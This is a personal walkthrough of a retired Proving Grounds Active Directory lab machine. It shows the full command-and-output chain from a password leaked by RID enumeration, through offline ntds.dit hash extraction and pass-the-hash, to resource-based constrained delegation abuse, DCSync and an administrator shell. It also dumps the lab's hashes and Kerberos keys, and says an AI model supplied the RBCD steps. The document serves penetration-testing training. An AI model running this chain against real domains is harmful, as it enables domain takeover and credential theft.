Resourced
AD Windows InsaneProving Grounds · retired · 2026-07-17
Summary: A Windows Active Directory domain controller — testing RID-cycling enumeration that leaks a plaintext password from a user description field, a grossly misconfigured share that exposes the domain's NTDS database directly, offline hash extraction and pass-the-hash, and BloodHound-guided resource-based constrained delegation abuse to DCSync the domain.
Enumeration
nmap scans:
┌──(kali㉿kali)-[~/oscp/resourced]
└─$ sudo nmap target -p- -T4 -oN portscan
[sudo] password for kali:
Starting Nmap 7.99 ( https://nmap.org ) at 2026-07-17 17:12 -0400
Nmap scan report for target (192.168.204.175)
Host is up (0.059s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49668/tcp open unknown
49674/tcp open unknown
49675/tcp open unknown
49695/tcp open unknown
49710/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 93.19 seconds
┌──(kali㉿kali)-[~/oscp/resourced]
└─$ sudo nmap target -p53,88,135,139,445,464,593,636,3268,3269,3389,5985,9389 -T4 -sCV -oN fingerprint
Starting Nmap 7.99 ( https://nmap.org ) at 2026-07-17 17:15 -0400
Nmap scan report for target (192.168.204.175)
Host is up (0.055s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-07-17 21:15:28Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: resourced.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-07-17T21:16:11+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: resourced
| NetBIOS_Domain_Name: resourced
| NetBIOS_Computer_Name: RESOURCEDC
| DNS_Domain_Name: resourced.local
| DNS_Computer_Name: ResourceDC.resourced.local
| DNS_Tree_Name: resourced.local
| Product_Version: 10.0.17763
|_ System_Time: 2026-07-17T21:15:32+00:00
| ssl-cert: Subject: commonName=ResourceDC.resourced.local
| Not valid before: 2026-07-16T21:10:37
|_Not valid after: 2027-01-15T21:10:37
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Host: RESOURCEDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-07-17T21:15:34
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.46 seconds
Using nxc we can find that we can actually authenticate to the ldap but ir throws an Error in SearchRequest. We run enum4linux to try to query ldap and rpc for info about our target with no credentials.
We find a domain user list (via rid-bruteforcing I think):
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xf72 RID: 0x457 acb: 0x00020010 Account: D.Durant Name: (null) Desc: Linear Algebra and crypto god
index: 0xf73 RID: 0x458 acb: 0x00020010 Account: G.Goldberg Name: (null) Desc: Blockchain expert
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xf6d RID: 0x452 acb: 0x00020010 Account: J.Johnson Name: (null) Desc: Networking specialist
index: 0xf6b RID: 0x450 acb: 0x00020010 Account: K.Keen Name: (null) Desc: Frontend Developer
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xf6c RID: 0x451 acb: 0x00000210 Account: L.Livingstone Name: (null) Desc: SysAdmin
index: 0xf6a RID: 0x44f acb: 0x00020010 Account: M.Mason Name: (null) Desc: Ex IT admin
index: 0xf70 RID: 0x455 acb: 0x00020010 Account: P.Parker Name: (null) Desc: Backend Developer
index: 0xf71 RID: 0x456 acb: 0x00020010 Account: R.Robinson Name: (null) Desc: Database Admin
index: 0xf6f RID: 0x454 acb: 0x00020010 Account: S.Swanson Name: (null) Desc: Military Vet now cybersecurity specialist
index: 0xf6e RID: 0x453 acb: 0x00000210 Account: V.Ventz Name: (null) Desc: New-hired, reminder: HotelCalifornia194!
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[M.Mason] rid:[0x44f]
user:[K.Keen] rid:[0x450]
user:[L.Livingstone] rid:[0x451]
user:[J.Johnson] rid:[0x452]
user:[V.Ventz] rid:[0x453]
user:[S.Swanson] rid:[0x454]
user:[P.Parker] rid:[0x455]
user:[R.Robinson] rid:[0x456]
user:[D.Durant] rid:[0x457]
user:[G.Goldberg] rid:[0x458]
This leaks a password for V.Ventz in the description.
I use awk '{print $8}' on the above section make a Users.txt list.
Foothold
We have our cred pair: V.Ventz:HotelCalifornia194!
┌──(kali㉿kali)-[~/oscp/resourced]
└─$ nxc smb target -u 'V.Ventz' -p 'HotelCalifornia194!' -d resourced.local --shares
SMB 192.168.204.175 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.204.175 445 RESOURCEDC [+] resourced.local\V.Ventz:HotelCalifornia194!
SMB 192.168.204.175 445 RESOURCEDC [*] Enumerated shares
SMB 192.168.204.175 445 RESOURCEDC Share Permissions Remark
SMB 192.168.204.175 445 RESOURCEDC ----- ----------- ------
SMB 192.168.204.175 445 RESOURCEDC ADMIN$ Remote Admin
SMB 192.168.204.175 445 RESOURCEDC C$ Default share
SMB 192.168.204.175 445 RESOURCEDC IPC$ READ Remote IPC
SMB 192.168.204.175 445 RESOURCEDC NETLOGON READ Logon server share
SMB 192.168.204.175 445 RESOURCEDC Password Audit READ
SMB 192.168.204.175 445 RESOURCEDC SYSVOL READ Logon server share
We see custom share Password Audit and we investigate with impacket-smbclient:
┌──(kali㉿kali)-[~/oscp/resourced]
└─$ impacket-smbclient resourced.local/v.ventz:'HotelCalifornia194!'@192.168.204.175
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
uiADMIN$
C$
IPC$
NETLOGON
Password Audit
SYSVOL
# use Password Audit
# dir
*** Unknown syntax: dir
# ls
drw-rw-rw- 0 Tue Oct 5 04:49:16 2021 .
drw-rw-rw- 0 Tue Oct 5 04:49:16 2021 ..
drw-rw-rw- 0 Tue Oct 5 04:49:15 2021 Active Directory
drw-rw-rw- 0 Tue Oct 5 04:49:16 2021 registry
# cd Active Directory
# ls
drw-rw-rw- 0 Tue Oct 5 04:49:16 2021 .
drw-rw-rw- 0 Tue Oct 5 04:49:16 2021 ..
-rw-rw-rw- 25165824 Tue Oct 5 04:49:16 2021 ntds.dit
-rw-rw-rw- 16384 Tue Oct 5 04:49:16 2021 ntds.jfm
# get ntds.dit
# get ntds.jfm
# cd ..
# ls
drw-rw-rw- 0 Tue Oct 5 04:49:16 2021 .
drw-rw-rw- 0 Tue Oct 5 04:49:16 2021 ..
drw-rw-rw- 0 Tue Oct 5 04:49:16 2021 Active Directory
drw-rw-rw- 0 Tue Oct 5 04:49:16 2021 registry
# cd registry
# ls
drw-rw-rw- 0 Tue Oct 5 04:49:16 2021 .
drw-rw-rw- 0 Tue Oct 5 04:49:16 2021 ..
-rw-rw-rw- 65536 Tue Oct 5 04:49:16 2021 SECURITY
-rw-rw-rw- 16777216 Tue Oct 5 04:49:16 2021 SYSTEM
Curiously we find a ntds.dit in Active Directory, with SYSTEM we can dump the hashes in this domain database.
We can also dump the SECURITY hive we find with SYSTEM as well.
We can use [[impacket-secretsdump]] to dump them offline:
┌──(kali㉿kali)-[~/oscp/resourced/passauditshare]
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM -security SECURITY LOCAL
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:507fdb105d9322cf53420c95780adf5f2dcdac7ca14f8b37188370c916a3fa6f2a511bb284aeac71211c939a866a2b4cc02c408e1d242ad4f5cc8f7b85d2448c18d23fb47f7b9b543a6cfb8999e40037f23dbfd8690869753979d15fe61bdcddb0ccff3d20c275207ca93e844c3b5aa1f658198225b3e54f90e0b71aaf76ba32bb1b598d189b6696c27d04674fd4c4f2c09d0df2e59fe93850aa928be813be3bd659f0d2ecba6e34fb5a3880db8155cf77e21eb44d63e1ae65abcc2aa5bdfb6bfe85e8590329929522aae501ba86d8622918e37b41daef8a2b00e78440d13e88a31fc14714923bba6fb99e13c81b3020
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d
[*] DPAPI_SYSTEM
dpapi_machinekey:0x85ec8dd0e44681d9dc3ed5f0c130005786daddbd
dpapi_userkey:0x22043071c1e87a14422996eda74f2c72535d4931
[*] NL$KM
0000 31 BF AC 76 98 3E CF 4A FC BD AD 0F 17 0F 49 E7 1..v.>.J......I.
0010 DA 65 A6 F9 C7 D4 FA 92 0E 5C 60 74 E6 67 BE A7 .e.......\`t.g..
0020 88 14 9D 4D E5 A5 3A 63 E4 88 5A AC 37 C7 1B F9 ...M..:c..Z.7...
0030 53 9C C1 D1 6F 63 6B D1 3F 77 F4 3A 32 54 DA AC S...ock.?w.:2T..
NL$KM:31bfac76983ecf4afcbdad0f170f49e7da65a6f9c7d4fa920e5c6074e667bea788149d4de5a53a63e4885aac37c71bf9539cc1d16f636bd13f77f43a3254daac
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::
[*] Kerberos keys from ntds.dit
Administrator:aes256-cts-hmac-sha1-96:73410f03554a21fb0421376de7f01d5fe401b8735d4aa9d480ac1c1cdd9dc0c8
Administrator:aes128-cts-hmac-sha1-96:b4fc11e40a842fff6825e93952630ba2
Administrator:des-cbc-md5:80861f1a80f1232f
RESOURCEDC$:aes256-cts-hmac-sha1-96:b97344a63d83f985698a420055aa8ab4194e3bef27b17a8f79c25d18a308b2a4
RESOURCEDC$:aes128-cts-hmac-sha1-96:27ea2c704e75c6d786cf7e8ca90e0a6a
RESOURCEDC$:des-cbc-md5:ab089e317a161cc1
krbtgt:aes256-cts-hmac-sha1-96:12b5d40410eb374b6b839ba6b59382cfbe2f66bd2e238c18d4fb409f4a8ac7c5
krbtgt:aes128-cts-hmac-sha1-96:3165b2a56efb5730cfd34f2df472631a
krbtgt:des-cbc-md5:f1b602194f3713f8
M.Mason:aes256-cts-hmac-sha1-96:21e5d6f67736d60430facb0d2d93c8f1ab02da0a4d4fe95cf51554422606cb04
M.Mason:aes128-cts-hmac-sha1-96:99d5ca7207ce4c406c811194890785b9
M.Mason:des-cbc-md5:268501b50e0bf47c
K.Keen:aes256-cts-hmac-sha1-96:9a6230a64b4fe7ca8cfd29f46d1e4e3484240859cfacd7f67310b40b8c43eb6f
K.Keen:aes128-cts-hmac-sha1-96:e767891c7f02fdf7c1d938b7835b0115
K.Keen:des-cbc-md5:572cce13b38ce6da
L.Livingstone:aes256-cts-hmac-sha1-96:cd8a547ac158c0116575b0b5e88c10aac57b1a2d42e2ae330669a89417db9e8f
L.Livingstone:aes128-cts-hmac-sha1-96:1dec73e935e57e4f431ac9010d7ce6f6
L.Livingstone:des-cbc-md5:bf01fb23d0e6d0ab
J.Johnson:aes256-cts-hmac-sha1-96:0452f421573ac15a0f23ade5ca0d6eada06ae85f0b7eb27fe54596e887c41bd6
J.Johnson:aes128-cts-hmac-sha1-96:c438ef912271dbbfc83ea65d6f5fb087
J.Johnson:des-cbc-md5:ea01d3d69d7c57f4
V.Ventz:aes256-cts-hmac-sha1-96:4951bb2bfbb0ffad425d4de2353307aa680ae05d7b22c3574c221da2cfb6d28c
V.Ventz:aes128-cts-hmac-sha1-96:ea815fe7c1112385423668bb17d3f51d
V.Ventz:des-cbc-md5:4af77a3d1cf7c480
S.Swanson:aes256-cts-hmac-sha1-96:8a5d49e4bfdb26b6fb1186ccc80950d01d51e11d3c2cda1635a0d3321efb0085
S.Swanson:aes128-cts-hmac-sha1-96:6c5699aaa888eb4ec2bf1f4b1d25ec4a
S.Swanson:des-cbc-md5:5d37583eae1f2f34
P.Parker:aes256-cts-hmac-sha1-96:e548797e7c4249ff38f5498771f6914ae54cf54ec8c69366d353ca8aaddd97cb
P.Parker:aes128-cts-hmac-sha1-96:e71c552013df33c9e42deb6e375f6230
P.Parker:des-cbc-md5:083b37079dcd764f
R.Robinson:aes256-cts-hmac-sha1-96:90ad0b9283a3661176121b6bf2424f7e2894079edcc13121fa0292ec5d3ddb5b
R.Robinson:aes128-cts-hmac-sha1-96:2210ad6b5ae14ce898cebd7f004d0bef
R.Robinson:des-cbc-md5:7051d568dfd0852f
D.Durant:aes256-cts-hmac-sha1-96:a105c3d5cc97fdc0551ea49fdadc281b733b3033300f4b518f965d9e9857f27a
D.Durant:aes128-cts-hmac-sha1-96:8a2b701764d6fdab7ca599cb455baea3
D.Durant:des-cbc-md5:376119bfcea815f8
G.Goldberg:aes256-cts-hmac-sha1-96:0d6ac3733668c6c0a2b32a3d10561b2fe790dab2c9085a12cf74c7be5aad9a91
G.Goldberg:aes128-cts-hmac-sha1-96:00f4d3e907818ce4ebe3e790d3e59bf7
G.Goldberg:des-cbc-md5:3e20fd1a25687673
[*] Cleaning up...
I use the same awk structure to make a list of the users and hashes, and I use —no-bruteforce to symmetrically go down the list querying them against the DC:
──(kali㉿kali)-[~/oscp/resourced]
└─$ nxc smb target -u Users.txt -H UserHashes.txt --no-bruteforce
SMB 192.168.204.175 445 RESOURCEDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:RESOURCEDC) (domain:resourced.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 192.168.204.175 445 RESOURCEDC [-] resourced.local\Administrator:12579b1666d4ac10f0f59f300776495f STATUS_LOGON_FAILURE
SMB 192.168.204.175 445 RESOURCEDC [-] resourced.local\Guest:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_ACCOUNT_DISABLED
SMB 192.168.204.175 445 RESOURCEDC [-] resourced.local\RESOURCEDC$:9ddb6f4d9d01fedeb4bccfb09df1b39d STATUS_LOGON_FAILURE
SMB 192.168.204.175 445 RESOURCEDC [-] resourced.local\krbtgt:3004b16f88664fbebfcb9ed272b0565b STATUS_LOGON_FAILURE
SMB 192.168.204.175 445 RESOURCEDC [-] resourced.local\M.Mason:3105e0f6af52aba8e11d19f27e487e45 STATUS_PASSWORD_EXPIRED
SMB 192.168.204.175 445 RESOURCEDC [-] resourced.local\K.Keen:204410cc5a7147cd52a04ddae6754b0c STATUS_PASSWORD_EXPIRED
SMB 192.168.204.175 445 RESOURCEDC [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808
We find L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 still has the same password and we can pass the hash as him.
We run his creds against smb and find he has the same permissions. We attempt to crack his hash with hashcat and fail.
We can get a shell as him though with winrm pass the hash and retrieve the user flag.
Privilege Escalation
Now we can run bloodhound-python via PtH to collect data on the domain and import to bloodhound as well as transfer winPEAS over to our staging directory in C:\Users\L.Livingstone\Documents
We see we have Outbound GenericAll over RESOURCEDC.RESOURCED.LOCAL Computer:
![[Pasted image 20260717170146.png]]
According to google overview:
Abusing **Outbound GenericAll** over a Domain Controller (DC) object typically involves **Computer Object Takeover** via **Resource-Based Constrained Delegation (RBCD)**. Since the attacker has **GenericAll** rights on the DC computer account, they can modify the `msDS-AllowedToActOnBehalfOfOtherIdentity` attribute to specify themselves (or a controlled computer) as the authorized delegate.
https://www.thehacker.recipes/ad/movement/dacl/grant-rights
Using claude we also get these steps explaining how to perform the RBCD: First we make a computer account that has SPNs, we write the RBCD on the Domain Controller computer. Then we get a ticket impersonating the Administrator of the DC computer with the new computer account. Then we can DCSync.
RBCD to DCSync
# 1. Create a computer account you control (uses MAQ)
addcomputer.py -computer-name 'FAKE01$' -computer-pass 'Passw0rd123!' \
'resourced.local/l.livingstone' -hashes :<nthash> -dc-ip <dc-ip>
# 2. Use your GenericAll to write RBCD on RESOURCEDC, trusting FAKE01$
rbcd.py -delegate-from 'FAKE01$' -delegate-to 'RESOURCEDC$' -action write \
'resourced.local/l.livingstone' -hashes :<nthash> -dc-ip <dc-ip>
# 3. Impersonate a DA to the DC, getting a service ticket as FAKE01$
getST.py -spn 'cifs/resourcedc.resourced.local' -impersonate 'Administrator' \
'resourced.local/FAKE01$:Passw0rd123!' -dc-ip <dc-ip>
# 4. Use that ticket to DCSync
export KRB5CCNAME=Administrator@[email protected]
secretsdump.py -k -no-pass 'resourcedc.resourced.local' -just-dc
┌──(kali㉿kali)-[~/bloodhound-ce]
└─$ impacket-addcomputer -computer-name 'FAKE01$' -computer-pass 'NewPass123!' 'resourced.local/l.livingstone' -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -dc-ip 192.168.204.175
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account FAKE01$ with password NewPass123!.
┌──(kali㉿kali)-[~/bloodhound-ce]
└─$ impacket-rbcd -delegate-from 'FAKE01$' -delegate-to 'RESOURCEDC$' -action write 'resourced.local/l.livingstone' -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -dc-ip 192.168.204.175
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] FAKE01$ can now impersonate users on RESOURCEDC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] FAKE01$ (S-1-5-21-537427935-490066102-1511301751-4101)
┌──(kali㉿kali)-[~/bloodhound-ce]
└─$ impacket-getST -spn 'cifs/resourcedc.resourced.local' -impersonate 'Administrator' 'resourced.local/FAKE01$:NewPass123!' -dc-ip 192.168.204.175
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@[email protected]
Now we export the generated service ticket to our kerberos cache and we can ntpdate and secretsdump the resourcedc computer with the ticket.
┌──(kali㉿kali)-[~/bloodhound-ce]
└─$ export KRB5CCNAME=Administrator@[email protected]
┌──(kali㉿kali)-[~/bloodhound-ce]
└─$ sudo ntpdate 192.168.204.175 && impacket-secretsdump -k -no-pass 'resourcedc.resourced.local' -just-dc
2026-07-17 19:13:40.979560 (-0400) -0.009484 +/- 0.028992 192.168.204.175 s1 no-leap
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8e0efd059433841f73d171c69afdda7c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:7ddb984fb68a47040c0931038a0ba0b4:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:c8532e8992f0e74e3850a845349e3e7f:::
FAKE01$:4101:aad3b435b51404eeaad3b435b51404ee:25451b15eeabfa492d9a18442a6e914b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:8b390f83fedcfa8a5275a4a80ab1200da3c6420a502eec668fc3a23d3d8cfba5
Administrator:aes128-cts-hmac-sha1-96:efa1aa29ae0536b35a2534f0abd881a3
Administrator:des-cbc-md5:0de34cf7bf32898f
krbtgt:aes256-cts-hmac-sha1-96:a85e2a98d5c75634e9104bbd6f60507b8b22324e18e945c6b74955b02293b40f
krbtgt:aes128-cts-hmac-sha1-96:07b7d34c08ed94eafec3875bb55111d3
krbtgt:des-cbc-md5:43b6972a7abaf7d0
M.Mason:aes256-cts-hmac-sha1-96:21e5d6f67736d60430facb0d2d93c8f1ab02da0a4d4fe95cf51554422606cb04
M.Mason:aes128-cts-hmac-sha1-96:99d5ca7207ce4c406c811194890785b9
M.Mason:des-cbc-md5:268501b50e0bf47c
K.Keen:aes256-cts-hmac-sha1-96:9a6230a64b4fe7ca8cfd29f46d1e4e3484240859cfacd7f67310b40b8c43eb6f
K.Keen:aes128-cts-hmac-sha1-96:e767891c7f02fdf7c1d938b7835b0115
K.Keen:des-cbc-md5:572cce13b38ce6da
L.Livingstone:aes256-cts-hmac-sha1-96:cd8a547ac158c0116575b0b5e88c10aac57b1a2d42e2ae330669a89417db9e8f
L.Livingstone:aes128-cts-hmac-sha1-96:1dec73e935e57e4f431ac9010d7ce6f6
L.Livingstone:des-cbc-md5:bf01fb23d0e6d0ab
J.Johnson:aes256-cts-hmac-sha1-96:0452f421573ac15a0f23ade5ca0d6eada06ae85f0b7eb27fe54596e887c41bd6
J.Johnson:aes128-cts-hmac-sha1-96:c438ef912271dbbfc83ea65d6f5fb087
J.Johnson:des-cbc-md5:ea01d3d69d7c57f4
V.Ventz:aes256-cts-hmac-sha1-96:4951bb2bfbb0ffad425d4de2353307aa680ae05d7b22c3574c221da2cfb6d28c
V.Ventz:aes128-cts-hmac-sha1-96:ea815fe7c1112385423668bb17d3f51d
V.Ventz:des-cbc-md5:4af77a3d1cf7c480
S.Swanson:aes256-cts-hmac-sha1-96:8a5d49e4bfdb26b6fb1186ccc80950d01d51e11d3c2cda1635a0d3321efb0085
S.Swanson:aes128-cts-hmac-sha1-96:6c5699aaa888eb4ec2bf1f4b1d25ec4a
S.Swanson:des-cbc-md5:5d37583eae1f2f34
P.Parker:aes256-cts-hmac-sha1-96:e548797e7c4249ff38f5498771f6914ae54cf54ec8c69366d353ca8aaddd97cb
P.Parker:aes128-cts-hmac-sha1-96:e71c552013df33c9e42deb6e375f6230
P.Parker:des-cbc-md5:083b37079dcd764f
R.Robinson:aes256-cts-hmac-sha1-96:90ad0b9283a3661176121b6bf2424f7e2894079edcc13121fa0292ec5d3ddb5b
R.Robinson:aes128-cts-hmac-sha1-96:2210ad6b5ae14ce898cebd7f004d0bef
R.Robinson:des-cbc-md5:7051d568dfd0852f
D.Durant:aes256-cts-hmac-sha1-96:a105c3d5cc97fdc0551ea49fdadc281b733b3033300f4b518f965d9e9857f27a
D.Durant:aes128-cts-hmac-sha1-96:8a2b701764d6fdab7ca599cb455baea3
D.Durant:des-cbc-md5:376119bfcea815f8
G.Goldberg:aes256-cts-hmac-sha1-96:0d6ac3733668c6c0a2b32a3d10561b2fe790dab2c9085a12cf74c7be5aad9a91
G.Goldberg:aes128-cts-hmac-sha1-96:00f4d3e907818ce4ebe3e790d3e59bf7
G.Goldberg:des-cbc-md5:3e20fd1a25687673
RESOURCEDC$:aes256-cts-hmac-sha1-96:ff4930dd4d30b291b677f6d570252dc6e9a3779e07c23f158910e4cdc51263bf
RESOURCEDC$:aes128-cts-hmac-sha1-96:e90ccb8c7724ec7a22004201895c4718
RESOURCEDC$:des-cbc-md5:f1750e9b13f42fda
FAKE01$:aes256-cts-hmac-sha1-96:b021f4fec6efef7c4a536e2d721dae6ad44c7b5f35411c6ce7286a13794d8bbe
FAKE01$:aes128-cts-hmac-sha1-96:2397ca7f497a8012bdb3f5abb77c8412
FAKE01$:des-cbc-md5:45ecba548f166894
[*] Cleaning up...
Now we can pass the hash and log in to the DC as Administrator and fetch the admin flag!
┌──(kali㉿kali)-[~/oscp/resourced]
└─$ evil-winrm -i 192.168.204.175 -u 'Administrator' -H 8e0efd059433841f73d171c69afdda7c
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
resourced\administrator